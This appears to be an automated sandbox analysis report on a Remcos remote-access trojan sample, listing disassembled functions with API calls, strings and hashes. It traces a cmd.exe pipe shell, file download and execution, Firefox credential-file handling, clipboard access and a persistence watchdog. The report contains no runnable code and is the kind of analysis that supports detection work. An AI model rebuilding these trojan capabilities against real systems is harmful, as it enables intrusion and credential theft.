                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$ForegroundText
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 29597999-0
                                                                                                                                                                    • Opcode ID: a221c2eefa6d09992f8ba53c09ea2394ba17581a0e53e18ab9a0c25fada816b0
                                                                                                                                                                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                                                                                                                    • Opcode Fuzzy Hash: a221c2eefa6d09992f8ba53c09ea2394ba17581a0e53e18ab9a0c25fada816b0
                                                                                                                                                                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004118B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                                                                    • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                                                                                                                    • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                                                                                                                    • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A367 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(004750F0,?,?,?), ref: 0040A3D2
                                                                                                                                                                      • Part of subcall function 0040B646: GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNextState
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3280314413-0
                                                                                                                                                                    • Opcode ID: 6b470850cb74240f926f2eab6fdb76e6f3f96cca2ed87157acb1fc025dc76ce0
                                                                                                                                                                    • Instruction ID: 9fd9bfc1c78bf2eb699ce6f84754fab0632f1b56c41780e55bb560be8a05fe45
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b470850cb74240f926f2eab6fdb76e6f3f96cca2ed87157acb1fc025dc76ce0
                                                                                                                                                                    • Instruction Fuzzy Hash: E1F062322043055BCA14AEA99D8486FBA55DB95319B00183FBD02666D2CB7AD8289B5F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                                                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                                                                                                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                                                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Startup
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 724789610-0
                                                                                                                                                                    • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                                                                                    • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                                                                                                                    • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Deallocatestd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1323251999-0
                                                                                                                                                                    • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                    • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                    • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                    • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: send
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                    • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                                                                                                                    • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                                                                                                                                    • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                                                                                                                    • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: recv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                                                    • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                                                                                                                    • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                                                                                                                                    • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                                                                                                                    • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00411CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                    • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                    • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                                                                                                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                                                                                                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                                                                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                                                                                                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                                                                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                                                                                                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                                                                                                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                                                                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                                                                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                                                                                                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                                    • API String ID: 1067849700-181434739
                                                                                                                                                                    • Opcode ID: 639be6e9c3666f0e56d442c7c633dd056aad2af30071dddc6934612cfb90f67c
                                                                                                                                                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                                                                                                                    • Opcode Fuzzy Hash: 639be6e9c3666f0e56d442c7c633dd056aad2af30071dddc6934612cfb90f67c
                                                                                                                                                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                                                                                                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                                    • API String ID: 2994406822-18413064
                                                                                                                                                                    • Opcode ID: 0c36db2859bd7c5efddd162eb7a9bd46f505a8fe816b69fdc27289b4be3fa82b
                                                                                                                                                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c36db2859bd7c5efddd162eb7a9bd46f505a8fe816b69fdc27289b4be3fa82b
                                                                                                                                                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00412117 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 227threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000127EE,00000000,00000000,00000000), ref: 004121AB
                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateOpen$HandleMutexProcessThreadValue
                                                                                                                                                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                    • API String ID: 261377708-13974260
                                                                                                                                                                    • Opcode ID: 73754e599d1e361b2f2d4439a328938cb6c66d24b99e1d6933cb7347129df002
                                                                                                                                                                    • Instruction ID: 5044532447ce4e70f722e285ad7bc5f912dfeea71c25201e33dbc8cc77036b6f
                                                                                                                                                                    • Opcode Fuzzy Hash: 73754e599d1e361b2f2d4439a328938cb6c66d24b99e1d6933cb7347129df002
                                                                                                                                                                    • Instruction Fuzzy Hash: 8171823160430167C618FB72CD579AE73A4AED0308F50057FF546A61E2FFBC9949C69A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                    • API String ID: 1164774033-3681987949
                                                                                                                                                                    • Opcode ID: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
                                                                                                                                                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
                                                                                                                                                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenClipboard.USER32 ref: 004168C2
                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004168D0
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                                                                                                                    • CloseClipboard.USER32 ref: 00416955
                                                                                                                                                                    • OpenClipboard.USER32 ref: 0041695C
                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                                                                    • CloseClipboard.USER32 ref: 00416984
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
